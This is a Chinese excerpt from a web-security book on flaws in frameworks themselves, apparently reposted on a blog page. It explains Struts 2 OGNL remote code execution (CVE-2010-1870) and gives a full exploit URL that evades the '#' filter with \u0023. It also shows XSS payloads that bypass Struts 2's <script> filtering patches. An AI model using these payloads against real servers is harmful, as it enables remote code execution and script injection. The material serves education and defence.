Web框架自身安全
下面讲到的几个漏洞,都是一些流行的Web开发框架曾经出现过的严重漏洞。研究这些案例,可以帮助我们更好地理解框架安全,在使用开发框架时更加的小心,同时让我们不要迷信于开发框架的权威。
2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts
2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。
这个漏洞的细节描述公布在exploit-db[1]上。
在这里简单摘述如下:
XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object
GraphNavigation Language)的。OGNL是怎么处理的呢?如下:
user.address.city=Bishkek&user['favoriteDrink']=kumys
会被转化成:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。
* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more...
由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution'(缺省为true)
* SecurityMemberAccess private field called'allowStaticMethodAccess' (缺省为false)
但这两个方法可以被覆盖,从而导致代码执行。
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution']= #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。
* #context - OgnlContext, the one guarding method execution based on'xwork.MethodAccessor. denyMethodExecution' property value.
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess'field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload。
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den
yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti
me()))=1
最终导致代码执行成功。
Struts 2官方目前公布了几个安全补丁[2]:
Struts 2官方的补丁页面
但深入其细节不难发现,补丁提交者对于安全的理解是非常粗浅的。以S2-002的漏洞修补为例,这是一个XSS漏洞,发现者当时提交给官方的POC只是构造了script标签。
http://localhost/foo/bar.action?<script>alert(1)</script>test=hello
我们看看当时官方是如何修补的:
新增的修补代码:
可以看到,只是简单地替换掉<script>
标签。
于是有人发现,如果构造 <<script>>,经过一次处理后会变为 <script>。漏洞报告给官方后,开发者再次提交了一个补丁,这次将递归处理类似<<<<script>>>>的情况。
修补代码仅仅是将if变成while:
这种漏洞修补方式,仍然是存在问题的,攻击者可以通过下面的方法绕过:
http://localhost/foo/bar.action?<script test=hello>alert(1)</script>
由此可见,Struts 2的开发者,本身对于安全的理解是非常不到位的。
本文节选自《白帽子讲Web安全》一书。
图书详细信息:http://blog.csdn.net/broadview2006/article/details/7441491
[1]
http://www.exploit-db.com/exploits/14360/
[2]
http://struts.apache.org/2.x/docs/security-bulletins.html
分享到:
相关推荐
数据分析:2016年网站漏洞数据分析 数据分析:2016年网站DDoS攻击数据分析 数据分析:2016年挂马事件 Web安全——2017 360公司的技术实力:漏洞挖掘能力 ...面向企业的Web安全整体框架 Web安全进阶
尽管Spring框架自身对编程模型没有限制,但其在Java应用中的频繁使用让它备受青睐,以至于后来让它作为EJB(EnterpriseJavaBeans)模型的补充,甚至是替补。Spring框架为开发提供了一系列的解决方案,比如利用控制...
所有POC都是以不对目标产生任何负面影响的宗旨编写的,既能发现缺陷也不会给目标业务造成大的负面影响,能灵活应用于企业与个人之间的安全需求。 POC数更新快; 使用场景 作为漏洞扫描框架,可被应用于但不限于如下...
Zend Framework (简写ZF)是由 Zend 公司支持开发的完全基于 PHP5 的开源PHP开发框架,可用于开发 Web 程序和服务,ZF采用 MVC(Model–View-Controller) 架构模式来分离应用程序中不同的部分方便程序的开发和维护。...
OpenStar是一个基于OpenResty的,高性能web平台,不仅仅包含了传统WAF的功能模块,还相应增加了其他灵活、友好、实用的功能,是增强的WAF、WEB扩展、CC防护的集合。 ... 标签:OpenStar Web框架
Web MVC和Spring Web提供了Java Web应用的框架或与其他流行的Web框架进行集成。 就是说可将两者一起使用,达到将两者自身的特点进行互补。 spring 框架介绍 : 它关注的领域是其他许多流行的Framework未曾关注的...
TPCMF是一款基于PHPCMF开发的内容管理框架,它只具备最基础的内容管理功能和最基础的用户管理权限,程序简洁轻量化设计,由系统框架+应用插件快速组建Web应用,发者可以根据自身的需求以应用插件的形式进行扩展,每...
书名叫《PHP应用程序安全编程》,本书涵盖内容包括:Web应用程序安全的基础知识;从开始阶段设计安全的应用程序——去除已有应用程序的安全漏洞;缓冲区溢出、文件系统访问、...web应用程序的自动化测试工具和框架;
框架:`SpringMVC+Spring+Mybatis` 后台前端:`bootstrap` 安全认证:`shiro` 全文检索:`lucence` 文本编辑器:`ueditor` 前端主题:`hexo` jquery效果:`粒子效果` 开发环境:`Itellij Idea`...
4、 通过discuz框架,编写的api接口,严格遵循官方安全过滤要求,极大的提高安全性,有力的遏制注入风险; 5、 本接口通过通用的GET、POST数据提交方式与本插件进行数据库交互,采用国际通过的json格式进行输出,这...
2. Django:Django是一个全功能的Web框架,也是Python最受欢迎的Web框架之一。它提供了包括ORM(对象关系映射)、模板引擎、路由和表单处理在内的各种功能,能够快速构建中大型的Web应用。 3. Pyramid:Pyramid是另...
TPCMF是一款基于PHPCMF开发的内容管理框架,它只具备最基础的内容管理功能和最基础的用户管理权限,程序简洁轻量化设计,由系统框架 应用插件快速组建Web应用,发者可以根据自身的需求以应用插件的形式进行扩展,每...
个人觉得这个工具比任何自动化测试框架都好使,使用关键字和数据双驱动,不需要写一行代码,无需维护脚本,只需要维护用例数据。Web元素只需要在Chrome中复制xPath即可,定位非常高效。 工具安全无木马,目的只为...
# Blog## 一个用SSM写的一个新闻系统框架:`SpringMVC+Spring+Mybatis` 后台前端:`bootstrap` 安全认证:`shiro` 全文检索:`lucence` 文本编辑器:`ueditor` 前端主题:`hexo` jquery效果:`粒子效果`...
而博客用户通过前台登录后,可对自己的博客空间进行管理,包括发布自己的网络日志、收藏个人图片、相关人员进行交流和沟通以及删除访问者发表的评论等。 1.通过网络日志的形式迅速便捷地发布自己的心得。 2.系统采用...
隐私保护:在采集数据时,严格遵守隐私保护法规,不泄露或滥用用户个人信息。 风险防范:了解并应对潜在的网络威胁,采取相应措施降低风险。 感谢您选择我们的Python爬虫工具与教程集合!让我们一起挖掘网络信息的...
如何通过部署深度防御来规划安全的网络 通过WLAN测试验证网络的安全性与连接性 从路由器入手改善网络的安全性 Web安全策略:使用云安全服务防范攻击安全策略 随着互联网黑客技术的飞速发展,网络世界的安全性不断受...
2. 自身安全防护的安全需求 5 2.2.1。 物理层安全需求 5 2.2。2. 网络层安全需求 6 2。2。3。 系统层安全需求 7 2。2。4。 应用层安全需求 8 3. 网络安全建设内容 8 3.1. 边界隔离措施 10 3。1.1。 下一代防火墙 10 ...
在技术实现方面,该教务管理系统使用了 Spring MVC 作为 Web 框架,它负责处理 HTTP 请求并返回响应。Spring MVC 内置了 Requestmapping、HandlerMapping 和 ViewResolver 等组件,可以简化开发流程。MyBatis 作为...